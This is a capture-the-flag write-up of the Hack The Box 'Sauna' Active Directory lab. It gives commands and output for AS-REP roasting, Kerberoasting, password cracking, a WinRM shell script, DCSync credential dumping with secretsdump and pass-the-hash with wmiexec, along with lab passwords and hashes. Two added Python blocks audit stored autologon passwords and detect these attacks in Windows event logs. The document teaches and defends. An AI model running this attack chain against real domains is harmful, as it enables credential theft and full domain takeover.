Hack The Box - Sauna

Sauna is a Windows machine rated easy and oriented towards Active Directory. The company’s website gives a potential list of users, which allows a brute force of account names through an ASRepRoasting attack. Getting a shell through WinRM allows listing the domain properties and finding a password in the WinLogon registry keys. This user has the necessary rights (DCSync) to dump the NTDS database, which allows connecting with the NTLM hash of the administrator.

Disclaimer: This post is about a quick solution, omitting the different search phases. Only results and a quick approach are presented.

Discovery / Enumeration

A quick port scan gives the services running on the target.

$ sudo nmap -sS -p 0-10000 -T4 -sV -sC default -O -v -oN scan_nmap 10.10.10.175

Host is up (0.035s latency).
Not shown: 9987 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-17 00:23:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

The domain name is gathered, and the services seem to indicate that the machine is an Active Directory Domain Controller.

Important note: to avoid problems with DNS resolution, don’t forget to add the relevant entries to the resolv.conf and hosts files.

$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kalinux

10.10.10.175 egotistical-bank.local
$ cat /etc/resolv.conf 
search egotistical-bank.local
nameserver 10.10.10.175

Potential users and ASRepRoasting

Having no other entry point, we quickly focus on the company’s website. Some research on possible exploitation of the IIS server gives nothing. However, an interesting element catches our attention: the company’s “about” page lists several employees, along with the following note.

Meet the team. So many bank account managers but only one security manager. Sounds about right!

From there, thinking of our target machine as a real company, we can imagine the usual naming conventions for Active Directory user accounts:

firstname.lastname
f.lastname
flastname
lastname

Based on this, we are able to build a small wordlist of potential accounts. I then spent a few minutes testing trivial passwords to try to find access, without success.

This is where another vulnerability, already exploited on other boxes, comes in ;). Named “ASRepRoasting”, it relies on the “Do not require Kerberos preauthentication” property of an account and allows retrieving a KRB5ASREP ticket (an AS-REP encrypted with a key derived from the account’s password) without prior authentication.

The impacket suite provides a script (GetNPUsers.py) to automate this request.

$ python GetNPUsers.py egotistical-bank.local/ -usersfile ../../../../HackTheBox/Sauna/users.txt
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:4f51424f1adb173550e06e8404dec4fe$98cac414702d5825e3ad4f4a5abfebe1fce96dfb8dd66d38e1184c67cda213c8b3c59d5a7f841d11b9589cd9c016355943d5fc729070494d50b9da512f509bc03329e682235af3e4599097d88ebab18bf395eb7d8aeb69b2cedb61a87d13aedcf6973a28a7bc09220386c39fa877dd93b3abe3da2ff9954fcbb7b1e35b4ac9565c5862d733b05cc8b0bf51e2e740bea0b709b5ed0bbd6022e7601ecbbf97cfbb7a521f62e7078962a5d84a4f81fc66a41981a6166194785090c07f9029cb1fabfd3575bacc0c84558f6d7950c91cc6c2a0e09ba19585b4d83ce6b953e0cd08de877d13abca6f39cac6d4d47024462dfb7d8a8d3a89637ee1ca6f1982cf395f39
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Bingo! The fsmith account seems valid. However, the ticket is not usable as is: it must be cracked to recover the password in clear text.

Password cracking and user shell

We now start a short password-cracking session, using john and a well-known wordlist.

$ sudo john KRB5ASREP_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5asrep

Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:22 DONE (2020-02-20 13:27) 0.04438g/s 467776p/s 467776c/s 467776C/s Thing..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed

The account password is cracked quite quickly. We can verify it with crackmapexec.

$ crackmapexec smb 10.10.10.175 -u fsmith -p 'Thestrokes23'                              
CME          10.10.10.175:445 SAUNA           [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICALBANK)
CME          10.10.10.175:445 SAUNA           [+] EGOTISTICALBANK\fsmith:Thestrokes23 
[*] KTHXBYE!

However, this account is not an administrator, and the possibilities for remote command execution are limited. This is where WinRM (Windows Remote Management) comes in. It is a Microsoft HTTP service/protocol, based on WS-Management (SOAP), that allows remote administration of Windows machines. Going back to our nmap scan, port 5985, used by default by WinRM, is open.

There are several ways to use it. I chose the following Ruby script, based on the winrm gem.

require 'winrm'

# WinRM over plain HTTP (port 5985), authenticating with the domain account.
conn = WinRM::Connection.new(
  endpoint: 'http://10.10.10.175:5985/wsman',
  user: 'EGOTISTICAL-BANK\fsmith',
  password: 'Thestrokes23'
)

conn.shell(:powershell) do |shell|
  output = nil
  loop do
    print 'PS > '
    command = $stdin.gets
    # Stop on "exit" or on end of input (Ctrl-D) instead of passing nil to run.
    break if command.nil? || command.strip == 'exit'

    # Stream stdout/stderr as they arrive; run returns the final result object.
    output = shell.run(command) do |stdout, stderr|
      $stdout.print stdout
      $stderr.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}" if output
end

This gives us access to the machine and the first flag!

$ ruby winrm_shell.rb

PS > whoami
egotisticalbank\fsmith

PS > pwd
Path                     
----                     
C:\Users\FSmith\Documents

PS > ls ../Desktop 
    Directory: C:\Users\FSmith\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----              1/23/2020 10:03 AM    34     user.txt

Enumeration (1/2) and Kerberoasting

Having access to the machine and the domain, the enumeration phase can begin. Thinking back to the note seen before, we can assume that one user account must have privileged rights (the “security manager” account).

So, first step: enumerate the domain accounts.

$ rpcclient -U 'EGOTISTICAL-BANK/fsmith' 10.10.10.175                                                    

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[HSmith] rid:[0x44f]
user:[FSmith] rid:[0x451]
user:[svc_loanmgr] rid:[0x454]

There are 3 accounts, excluding the built-in accounts required by the domain. Since we already control fsmith, only 2 potential targets are left. Neither of them is part of the initial list of users, so one of them could be the famous security account.

After some research, it turns out that the hsmith account is used as a service account (it has a Service Principal Name registered). This can be seen with impacket.

$ python GetUserSPNs.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/fsmith
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
ServicePrincipalName                      Name    MemberOf  PasswordLastSet             LastLogon 
----------------------------------------  ------  --------  --------------------------  ---------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111  HSmith            2020-01-23 06:54:34.140321  <never>   

We can then exploit it with a “Kerberoasting” attack. It consists of requesting a TGS ticket for a specific service account: any authenticated domain user may do so, and the ticket is encrypted with a key derived from the service account’s password. It is then necessary to crack the ticket offline in order to use the account.

$ python GetUserSPNs.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/fsmith -request
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
ServicePrincipalName                      Name    MemberOf  PasswordLastSet             LastLogon 
----------------------------------------  ------  --------  --------------------------  ---------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111  HSmith            2020-01-23 06:54:34.140321  <never>   

$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$SAUNA/HSmith.EGOTISTICALBANK.LOCAL~60111*$3f83e16fcf6121de6d5108bf7f5ca54e$…

Using the same technique as for the previous ticket (but with the krb5tgs format), we can try to crack it. We quickly manage to find the password for hsmith, which is… the same password as for fsmith.

$ crackmapexec smb 10.10.10.175 -u hsmith -p 'Thestrokes23'                             
CME          10.10.10.175:445 SAUNA           [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICALBANK)
CME          10.10.10.175:445 SAUNA           [+] EGOTISTICALBANK\hsmith:Thestrokes23 
[*] KTHXBYE!

However, we also quickly realize that this user does not have any privileges that are particularly interesting for us…

Enumeration (2/2) and getting the second account

Since the second account recovered does not help to compromise the machine, we can run a second enumeration phase, focused on the machine and its files.

After some classic searches, interesting information can be recovered in the WinLogon registry key, where automatic logon credentials are stored.

PS > reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ    
    LegalNoticeText    REG_SZ    
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0x8e3982368
    ShutdownFlags    REG_DWORD    0x80000027
    DisableLockWorkstation    REG_DWORD    0x0
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey
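An added audit helper (not part of the original post) that parses `reg query` output like the dump above and flags a stored DefaultPassword. Note that the dump above holds a DefaultPassword without any AutoAdminLogon value, so the credential is a leftover rather than an active autologon; the excerpt in the code is constructed with placeholder names and password, and the regex assumes the column layout shown above.

```python
"""Spot clear-text autologon credentials in `reg query ...\\Winlogon` output.
The excerpt below is constructed (placeholder domain, user and password) but
keeps the real command's layout: name, type and data separated by four spaces."""
import re
from typing import Dict, List

SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    CachedLogonsCount    REG_SZ    10
    DefaultDomainName    REG_SZ    EXAMPLEDOMAIN
    DefaultUserName    REG_SZ    EXAMPLEDOMAIN\svc_example
    LegalNoticeCaption    REG_SZ    
    Shell    REG_SZ    explorer.exe
    DefaultPassword    REG_SZ    placeholder-not-a-real-password
"""

# "<indent>Name<spaces>REG_TYPE<spaces>Data"; the data column may be empty
VALUE_RE = re.compile(r"^\s+(\S+)\s{2,}(REG_\w+)(?:\s{2,}(.*))?$")

def parse_reg_query(text: str) -> Dict[str, str]:
    """Map value names to their data for the key listed in a `reg query` dump."""
    values: Dict[str, str] = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            values[m.group(1)] = (m.group(3) or "").strip()
    return values

def autologon_findings(values: Dict[str, str]) -> List[str]:
    """Report a stored DefaultPassword and whether autologon is actually on."""
    findings: List[str] = []
    if not values.get("DefaultPassword"):
        return findings
    user = values.get("DefaultUserName", "<unset>")
    findings.append(f"DefaultPassword stored in clear text for {user}")
    # A password left behind while AutoAdminLogon is absent or 0 is a stale
    # credential: autologon no longer happens, but the secret still works.
    if values.get("AutoAdminLogon") != "1":
        findings.append("AutoAdminLogon is not enabled: leftover credential")
    return findings
```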

Using the same technique as for the other accounts, we can test the password with crackmapexec. Note that the registry names the user svc_loanmanager, whereas the domain account enumerated earlier is svc_loanmgr.

$ crackmapexec smb 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
CME          10.10.10.175:445 SAUNA           [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICALBANK)
CME          10.10.10.175:445 SAUNA           [+] EGOTISTICALBANK\svc_loanmgr:Moneymakestheworldgoround! 
[*] KTHXBYE!

Alright! We now have all user accounts (except the built-in ones)!

NTDS dumping and compromise

I’m skipping the research phase in order to go straight to the solution. The recon phase can be done with tools like BloodHound. This way, we can see that our svc_loanmgr user has DCSync privileges! In other words, the svc_loanmgr account has the replication rights needed to read the secrets of the Active Directory NTDS database.

So, for example, we can remotely extract the NTDS.dit secrets using impacket’s secretsdump.py (through the DRSUAPI replication method, without touching the file itself).

$ secretsdump.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK/svc_loanmgr@10.10.10.175
Impacket v0.9.21.dev1+20200220.181330.03cbe6e8 - Copyright 2020 SecureAuth Corporation

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:57e522d5738515b8a45d0d4d7b6546e2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:ace005f6cec7d0c39b54a2bc7c55637bfede1ef5c02bdf7056b71770a3563ea2
SAUNA$:aes128-cts-hmac-sha1-96:c46b61ef2fff501974152d8e0871bd4e
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up... 
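As a defender-side complement to the three Kerberos and replication techniques used in this writeup (AS-REP roasting, Kerberoasting, DCSync), here is an added example (not from the original post) that flags them in Windows Security events 4768, 4769 and 4662. The events are constructed, field names follow the EventData names of those events, and the filters (pre-auth type 0, RC4 service tickets for user SPNs, replication rights exercised by a non-computer account) are my assumptions about what separates the attack from normal domain traffic.

```python
"""Flag the AD attack patterns from this writeup in Windows Security events 4768,
4769 and 4662. Field names follow the EventData names of those events; every
event below is a constructed sample, not a log taken from the box."""
from typing import Dict, List, Optional, Tuple

RC4_HMAC = "0x17"  # etype 23, what GetUserSPNs asks for, hence john-crackable
# Extended rights a DCSync client exercises on the domain object
# (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All)
REPL_RIGHTS = ("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
               "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")

SAMPLE_EVENTS: List[Dict[str, object]] = [
    # AS-REP roast: TGT handed out with no pre-authentication at all
    {"EventID": 4768, "TargetUserName": "fsmith", "PreAuthType": "0",
     "TicketEncryptionType": "0x17"},
    # Kerberoast: RC4 service ticket for a user account's SPN
    {"EventID": 4769, "TargetUserName": "fsmith@EGOTISTICAL-BANK.LOCAL",
     "ServiceName": "HSmith", "TicketEncryptionType": "0x17"},
    # Benign: computer accounts (and krbtgt) are excluded even with RC4
    {"EventID": 4769, "TargetUserName": "fsmith@EGOTISTICAL-BANK.LOCAL",
     "ServiceName": "SAUNA$", "TicketEncryptionType": "0x17"},
    # DCSync: a user account exercising replication rights
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Benign: the domain controller's own computer account replicating
    {"EventID": 4662, "SubjectUserName": "SAUNA$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]

def classify(ev: Dict[str, object]) -> Optional[str]:
    """Name the technique an event suggests, or None for benign traffic."""
    eid = ev.get("EventID")
    if eid == 4768 and ev.get("PreAuthType") == "0":
        return "AS-REP roasting"  # only accounts with pre-auth disabled do this
    if eid == 4769:
        svc = str(ev.get("ServiceName", ""))
        if (ev.get("TicketEncryptionType") == RC4_HMAC
                and svc.lower() != "krbtgt" and not svc.endswith("$")):
            return "Kerberoasting"
    if eid == 4662:
        props = str(ev.get("Properties", "")).lower()
        actor = str(ev.get("SubjectUserName", ""))
        # Replication by a DC computer account is normal; by a user it is DCSync
        if any(g in props for g in REPL_RIGHTS) and not actor.endswith("$"):
            return "DCSync"
    return None

def scan(events: List[Dict[str, object]]) -> List[Tuple[str, str]]:
    """Return (technique, account) pairs for every suspicious event."""
    pairs = ((classify(ev), ev) for ev in events)
    return [(t, str(ev.get("TargetUserName") or ev.get("SubjectUserName")))
            for t, ev in pairs if t]
```

Running `scan(SAMPLE_EVENTS)` yields one hit per technique; in a real domain the 4769 rule still needs tuning where RC4 is widely enabled.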

At this point, we have all the information needed to compromise the machine. Indeed, since we have the NTLM hash of the Domain Administrator account, we can use it directly in a Pass-the-Hash attack to access the machine.

$ wmiexec.py egotistical-bank/Administrator@10.10.10.175 -hashes 'aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff' 
Impacket v0.9.21.dev1+20200220.181330.03cbe6e8 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
egotisticalbank\administrator

C:\>hostname
SAUNA

C:\>dir C:\Users\Administrator\Desktop
 Volume in drive C has no label.
 Volume Serial Number is 489C-D8FC

 Directory of C:\Users\Administrator\Desktop

01/23/2020  03:11 PM    <DIR>          .
01/23/2020  03:11 PM    <DIR>          ..
01/23/2020  10:22 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   7,982,071,808 bytes free

w00ted!
